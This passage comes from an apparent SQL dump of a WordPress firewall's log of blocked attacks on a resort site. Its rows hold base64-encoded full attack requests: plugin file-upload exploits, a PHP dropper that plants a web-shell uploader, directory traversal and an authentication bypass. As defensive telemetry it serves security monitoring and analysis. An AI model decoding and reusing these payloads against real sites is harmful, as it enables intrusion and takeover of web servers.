Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"NGdmajY3ZTN5dW42c3RsLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZSwgVGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocApUZTogdHJhaWxlcnMKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2Ojc3LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzcuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PXhZelpZCkNvbnRlbnQtTGVuZ3RoOiA0MzY0CgotLXhZelpZCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iY21kIgoKdXBsb2FkCi0teFl6WlkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLXhZelpZLS0K\"}'),(175025,1601909554.371364,1601909553.492600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"NGdmajY3ZTN5dW42c3RsLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZSwgVGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocApUZTogdHJhaWxlcnMKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2Ojc3LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzcuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PXhZelpZCkNvbnRlbnQtTGVuZ3RoOiA0MzY0CgotLXhZelpZCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iY21kIgoKdXBsb2FkCi0teFl6WlkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLXhZelpZLS0K\"}'),(175026,1601909551.321432,1601909550.530000,'\0\0\0\0\0\0\0\0\0\0gi@',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"NGdmajY3ZTN5dW42c3RsLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZSwgVGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocApUZTogdHJhaWxlcnMKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2Ojc3LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzcuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PXhZelpZCkNvbnRlbnQtTGVuZ3RoOiA0MzY0CgotLXhZelpZCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iY21kIgoKdXBsb2FkCi0teFl6WlkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLXhZelpZLS0K\"}'),(175027,1601909544.425753,1601909543.521700,'\0\0\0\0\0\0\0\0\0\0r',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"NGdmajY3ZTN5dW42c3RsLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZSwgVGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocApUZTogdHJhaWxlcnMKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2Ojc3LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzcuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PXhZelpZCkNvbnRlbnQtTGVuZ3RoOiA0MzY0CgotLXhZelpZCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iY21kIgoKdXBsb2FkCi0teFl6WlkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLXhZelpZLS0K\"}'),(175028,1601909540.292476,1601909539.548500,'\0\0\0\0\0\0\0\0\0\0z',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"NGdmajY3ZTN5dW42c3RsLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZSwgVGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocApUZTogdHJhaWxlcnMKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2Ojc3LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzcuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PXhZelpZCkNvbnRlbnQtTGVuZ3RoOiA0MzY0CgotLXhZelpZCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iY21kIgoKdXBsb2FkCi0teFl6WlkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLXhZelpZLS0K\"}'),(175029,0.000000,1602338112.388964,'\0\0\0\0\0\0\0\0\0\0/ˉ',0,302,0,1,0,'https://ashbyresort.com/ar-login/','https://ashbyresort.com/ar-login','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36','loginOK',NULL,NULL),(175030,1602530444.811325,1602530443.668200,'\0\0\0\0\0\0\0\0\0\0R',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/cherry-plugin/admin/import-export/upload.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvdXBsb2FkLnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL2NoZXJyeS1wbHVnaW4vYWRtaW4vaW1wb3J0LWV4cG9ydC91cGxvYWQucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IGk2ODY7IHJ2OjI4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMjguMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTFkMjkwNzkxMjcwMmViOTAzNjI2YjliZjVjYTIxMGQ0CkNvbnRlbnQtTGVuZ3RoOiAxNTEyCgotLTFkMjkwNzkxMjcwMmViOTAzNjI2YjliZjVjYTIxMGQ0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJzZXR0aW5nc19hdXRvLnBocCIKQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhCkV4cGlyZXM6IDAKCjx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+DQo8P3BocA0KZnVuY3Rpb24gaHR0cF9nZXQoJHVybCl7DQoJJGltID0gY3VybF9pbml0KCR1cmwpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAxMCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCglyZXR1cm4gY3VybF9leGVjKCRpbSk7DQoJY3VybF9jbG9zZSgkaW0pOw0KfQ0KJHMgPSAnPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT48P3BocCBlY2hvIFwnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+XCc7ZWNobyBcJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT5cJztpZiggJF9QT1NUWyJfdXBsIl0gPT0gIlVwbG9hZCIgKSB7aWYoQGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSkpIHsgZWNobyAiPGI+U2hlbGwgVXBsb2FkZWQgISA6KTxiPjxicj48YnI+IjsgfWVsc2UgeyBlY2hvICI8Yj5Ob3QgdXBsb2FkZWQgISA8L2I+PGJyPjxicj4iOyB9fT8+JzsNCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3dwLWNvbnRlbnQvdnVsbi5waHAiOw0KJHRleHQgPSAkczsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi92dWxuLmh0bSIgOw0KJHRleHQyID0gJ1Z1bG4hISBwYXRjaCBpdCBOb3chJzsNCiRvcGVuMiA9IGZvcGVuKCRjaGVjazIsICd3Jyk7DQpmd3JpdGUoJG9wZW4yLCAkdGV4dDIpOw0KZmNsb3NlKCRvcGVuMik7DQppZihmaWxlX2V4aXN0cygkY2hlY2syKSl7DQogICAgZWNobyAkY2hlY2syLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQpAdW5saW5rKF9fRklMRV9fKTsNCj8+DQoKLS0xZDI5MDc5MTI3MDJlYjkwMzYyNmI5YmY1Y2EyMTBkNC0tCg==\"}'),(175031,1602530458.372159,1602530457.753600,'\0\0\0\0\0\0\0\0\0\0R',0,403,0,0,0,'http://ashbyresort.com/?gf_page=upload',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2dmb3JtX3VuaXF1ZV9pZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4v\",\"path\":\"Lw==\",\"category\":\"lfi\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvP2dmX3BhZ2U9dXBsb2FkIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IGk2ODY7IHJ2OjI4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMjguMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PTA3YjgzYjU4OGI1MWJlYTQwZWY0YjcxNGVkY2JlMzEyCkNvbnRlbnQtTGVuZ3RoOiA1MjcKCi0tMDdiODNiNTg4YjUxYmVhNDBlZjRiNzE0ZWRjYmUzMTIKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJnZm9ybV91bmlxdWVfaWQiCgouLi8uLi8uLi8uLi8uLi8KLS0wN2I4M2I1ODhiNTFiZWE0MGVmNGI3MTRlZGNiZTMxMgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpZWxkX2lkIgoKMwotLTA3YjgzYjU4OGI1MWJlYTQwZWY0YjcxNGVkY2JlMzEyCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZm9ybV9pZCIKCjEKLS0wN2I4M2I1ODhiNTFiZWE0MGVmNGI3MTRlZGNiZTMxMgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9Im5hbWUiCgp2dWxuLmh0bQotLTA3YjgzYjU4OGI1MWJlYTQwZWY0YjcxNGVkY2JlMzEyCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJyb2NrLmpwZyIKQ29udGVudC1UeXBlOiAKRXhwaXJlczogMAoKCi0tMDdiODNiNTg4YjUxYmVhNDBlZjRiNzE0ZWRjYmUzMTItLQo=\"}'),(175032,1602530457.567975,1602530456.397600,'\0\0\0\0\0\0\0\0\0\0R',0,403,0,0,0,'http://ashbyresort.com/?gf_page=upload',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2dmb3JtX3VuaXF1ZV9pZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4v\",\"path\":\"Lw==\",\"category\":\"lfi\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvP2dmX3BhZ2U9dXBsb2FkIEhUVFAvMS4xCkFjY2VwdDogKi8qCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IGk2ODY7IHJ2OjI4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMjguMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PWM0ODFkMmVlYTk3Y2QzMzc0MTMwMDBkNDUzMmY1NWI0CkNvbnRlbnQtTGVuZ3RoOiA2NjcKCi0tYzQ4MWQyZWVhOTdjZDMzNzQxMzAwMGQ0NTMyZjU1YjQKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJnZm9ybV91bmlxdWVfaWQiCgouLi8uLi8uLi8uLi8KLS1jNDgxZDJlZWE5N2NkMzM3NDEzMDAwZDQ1MzJmNTViNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpZWxkX2lkIgoKMwotLWM0ODFkMmVlYTk3Y2QzMzc0MTMwMDBkNDUzMmY1NWI0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZm9ybV9pZCIKCjEKLS1jNDgxZDJlZWE5N2NkMzM3NDEzMDAwZDQ1MzJmNTViNApDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9Im5hbWUiCgp2dWxuLmh0bQotLWM0ODFkMmVlYTk3Y2QzMzc0MTMwMDBkNDUzMmY1NWI0CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJyb2NrLmpwZyIKQ29udGVudC1UeXBlOiAKRXhwaXJlczogMAoKPGJvZHkgc3R5bGU9J2NvbG9yOiB0cmFuc3BhcmVudDtiYWNrZ3JvdW5kLWNvbG9yOiBibGFjayc+PGNlbnRlcj48aDE+PGIgc3R5bGU9J2NvbG9yOiB3aGl0ZSc+VnVsbiEhIHBhdGNoIGl0IG5vdyE8cCBzdHlsZT0nY29sb3I6IHRyYW5zcGFyZW50Jz4KLS1jNDgxZDJlZWE5N2NkMzM3NDEzMDAwZDQ1MzJmNTViNC0tCg==\"}'),(175033,1602530475.839663,1602530474.935200,'\0\0\0\0\0\0\0\0\0\0R',0,403,0,0,0,'http://ashbyresort.com/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":0,\"fullRequest\":\"R0VUIC8\\/dXBfYXV0b19sb2c9dHJ1ZSBIVFRQLzEuMQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQpIb3N0OiBhc2hieXJlc29ydC5jb20KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBydjozNi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzM2LjAKCg==\"}'),(175034,1602530515.181263,1602530514.051600,'\0\0\0\0\0\0\0\0\0\0R',0,403,0,0,0,'http://ashbyresort.com/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload (Patterns)','{\"learningMode\":0,\"failedRules\":\"68\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtYWRtaW4vYWRtaW4tYWpheC5waHAgSFRUUC8xLjEKQWNjZXB0OiAqLyoKQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUKSG9zdDogYXNoYnlyZXNvcnQuY29tClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggaTY4NjsgcnY6MjguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8yOC4wCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9ZDk5OTgzMTFmZGU1NTRhM2U2M2VkNjI1YjdhMDc3M2MKQ29udGVudC1MZW5ndGg6IDE3MjIKCi0tZDk5OTgzMTFmZGU1NTRhM2U2M2VkNjI1YjdhMDc3M2MKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJhY3Rpb24iCgpubV9wZXJzb25hbGl6ZWRwcm9kdWN0X3VwbG9hZF9maWxlCi0tZDk5OTgzMTFmZGU1NTRhM2U2M2VkNjI1YjdhMDc3M2MKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJuYW1lIgoKdXBsb2FkLnBocAotLWQ5OTk4MzExZmRlNTU0YTNlNjNlZDYyNWI3YTA3NzNjCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZmlsZSI7IGZpbGVuYW1lPSJzZXR0aW5nc19hdXRvLnBocCIKQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhCkV4cGlyZXM6IDAKCjx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+DQo8P3BocA0KZnVuY3Rpb24gaHR0cF9nZXQoJHVybCl7DQoJJGltID0gY3VybF9pbml0KCR1cmwpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAxMCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCglyZXR1cm4gY3VybF9leGVjKCRpbSk7DQoJY3VybF9jbG9zZSgkaW0pOw0KfQ0KJHMgPSAnPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT48P3BocCBlY2hvIFwnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+XCc7ZWNobyBcJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT5cJztpZiggJF9QT1NUWyJfdXBsIl0gPT0gIlVwbG9hZCIgKSB7aWYoQGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSkpIHsgZWNobyAiPGI+U2hlbGwgVXBsb2FkZWQgISA6KTxiPjxicj48YnI+IjsgfWVsc2UgeyBlY2hvICI8Yj5Ob3QgdXBsb2FkZWQgISA8L2I+PGJyPjxicj4iOyB9fT8+JzsNCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3dwLWNvbnRlbnQvdnVsbi5waHAiOw0KJHRleHQgPSAkczsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi92dWxuLmh0bSIgOw0KJHRleHQyID0gJ1Z1bG4hISBwYXRjaCBpdCBOb3chJzsNCiRvcGVuMiA9IGZvcGVuKCRjaGVjazIsICd3Jyk7DQpmd3JpdGUoJG9wZW4yLCAkdGV4dDIpOw0KZmNsb3NlKCRvcGVuMik7DQppZihmaWxlX2V4aXN0cygkY2hlY2syKSl7DQogICAgZWNobyAkY2hlY2syLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQpAdW5saW5rKF9fRklMRV9fKTsNCj8+DQoKLS1kOTk5ODMxMWZkZTU1NGEzZTYzZWQ2MjViN2EwNzczYy0tCg==\"}'),(175035,1602530513.857317,1602530512.501100,'\0\0\0\0\0\0\0\0\0\0R',0,403,0,0,0,'http://ashbyresort.com/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Malicious File Upload 